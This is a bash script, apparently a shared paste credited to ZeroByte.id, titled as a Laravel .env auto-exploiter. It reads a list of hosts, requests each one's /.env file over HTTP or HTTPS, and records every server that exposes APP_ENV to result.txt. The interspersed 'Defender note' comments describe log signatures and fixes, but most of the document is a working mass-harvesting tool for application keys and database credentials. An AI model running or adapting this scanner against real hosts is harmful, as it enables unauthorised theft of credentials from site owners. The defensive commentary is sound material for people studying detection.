zerobyte-id

Exploiter Laravel .env v.1

Feb 17th, 2018
#!/bin/bash
# Auto Exploit Laravel .env
# Coded by ZeroByte.id
# https://zerobyte.id/ - https://blog.zerobyte.id/

  #######################################
  # Fetch https://www.<host>/.env and report whether the response body
  # contains the literal string APP_ENV.
  # Globals:   s (read) - host currently being processed by the caller's
  #            loop; positional arguments are not consulted.
  # Outputs:   "[OK] <host>/.env" or "[BAD] <host>" on stdout. Hits are also
  #            appended to result.txt in the working directory. The name
  #            printed is the bare host, not the www. URL that was fetched.
  # Defender note: an [OK] means the server handed out the application's
  # .env file, which typically holds the application key and database
  # credentials. The probe is a plain GET for /.env carrying the fixed
  # Chrome 62 User-Agent below, so it stands out in access logs. Serving
  # only the framework's public/ directory and denying dotfile requests
  # at the web server removes the exposure.
  #######################################
  exploitwww() {
    local agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"
    local host=$s
    local body

    # timeout(1) ends the request after 5 s, before curl's own 10 s -m limit.
    body=$(timeout 5 curl -s -m 10 -A "$agent" "https://www.${host}/.env")

    if [[ $body != *APP_ENV* ]]; then
      printf '%s\n' "[BAD] $host"
      return
    fi

    printf '%s\n' "[OK] $host/.env"
    printf '%s\n' "$host/.env" >> result.txt
  }
  #######################################
  # Fetch http://<host>/.env and report whether the response body contains
  # the literal string APP_ENV.
  # Globals:   s (read) - host currently being processed by the caller's
  #            loop; positional arguments are not consulted.
  # Outputs:   "[OK] <host>/.env" or "[BAD] <host>" on stdout. Hits are also
  #            appended to result.txt in the working directory.
  # Defender note: the match is a substring test on the body, so any page
  # that merely contains the text APP_ENV is reported as a hit. A true
  # positive means the .env file (typically the application key and
  # database credentials) is readable over plain HTTP. In access logs the
  # request appears as GET /.env with the fixed Chrome 62 User-Agent below.
  #######################################
  exploit() {
    local agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"
    local host=$s
    local body

    # timeout(1) ends the request after 5 s, before curl's own 10 s -m limit.
    body=$(timeout 5 curl -s -m 10 -A "$agent" "http://${host}/.env")

    if [[ $body != *APP_ENV* ]]; then
      printf '%s\n' "[BAD] $host"
      return
    fi

    printf '%s\n' "[OK] $host/.env"
    printf '%s\n' "$host/.env" >> result.txt
  }
  #######################################
  # Fetch https://<host>/.env and classify the response body:
  #   contains "APP_ENV"            -> reported as a hit and logged
  #   contains "Moved Permanently"  -> retried against the www. host
  #   anything else                 -> reported as [BAD]
  # Globals:   s (read) - host currently being processed by the caller's
  #            loop; positional arguments are not consulted.
  # Outputs:   "[OK] <host>/.env" or "[BAD] <host>" on stdout. Hits are also
  #            appended to result.txt in the working directory.
  # curl runs without -L, so a redirect is not followed; the second branch
  # matches the text of the redirect page itself.
  # Defender note: a hit means the .env file (typically the application key
  # and database credentials) is served from the web root. The request is a
  # plain GET for /.env with the fixed Chrome 62 User-Agent below, possibly
  # followed by the same request to the www. host.
  #######################################
  exploithttps() {
    local agent="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"
    local host=$s
    local body

    # timeout(1) ends the request after 5 s, before curl's own 10 s -m limit.
    body=$(timeout 5 curl -s -m 10 -A "$agent" "https://${host}/.env")

    case $body in
      *APP_ENV*)
        printf '%s\n' "[OK] $host/.env"
        printf '%s\n' "$host/.env" >> result.txt
        ;;
      *'Moved Permanently'*)
        exploitwww "$host"
        ;;
      *)
        printf '%s\n' "[BAD] $host"
        ;;
    esac
  }
  # Print the banner, then walk the host list named by the first argument.
  # The list is read with word splitting, so entries are separated by any
  # whitespace. Each host first gets one request to the bare name, and the
  # status code picks the follow-up:
  #   code contains 200 -> exploit       (plain-HTTP /.env request)
  #   code contains 301 -> exploithttps  (HTTPS /.env request)
  #   otherwise         -> "[UNKNOWN] => <host>" and no further request
  # Defender note: every request in a run carries the same fixed Chrome 62
  # User-Agent, and a listed host sees one request for / followed by one or
  # two for /.env. That sequence is a usable signature in web logs.
  cat <<'BANNER'
 _____              _           _         _     _
|__  /___ _ __ ___ | |__  _   _| |_ ___  (_) __| |
  / // _ \ '__/ _ \| '_ \| | | | __/ _ \ | |/ _` |
 / /|  __/ | | (_) | |_) | |_| | ||  __/_| | (_| |
/____\___|_|  \___/|_.__/ \__, |\__\___(_)_|\__,_|
                          |___/                  
-------------------------------------------------
-------- Laravel Environment Exploiter ----------
-------------------------------------------------
Usage : ./laravel.sh list.txt
 
BANNER
  ua="Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36"
  # NOTE(review): $1 and the list contents are left unquoted exactly as in
  # the original, which relies on word splitting here.
  for s in $(cat $1); do
    # Only the HTTP status code is kept; the response body goes to /dev/null.
    status=$(curl -s -m 10 -A "$ua" -w '%{http_code}' "$s" -o /dev/null)
    case $status in
      *200*)
        exploit $s
        ;;
      *301*)
        exploithttps $s
        ;;
      *)
        printf '%s\n' "[UNKNOWN] => $s"
        ;;
    esac
  done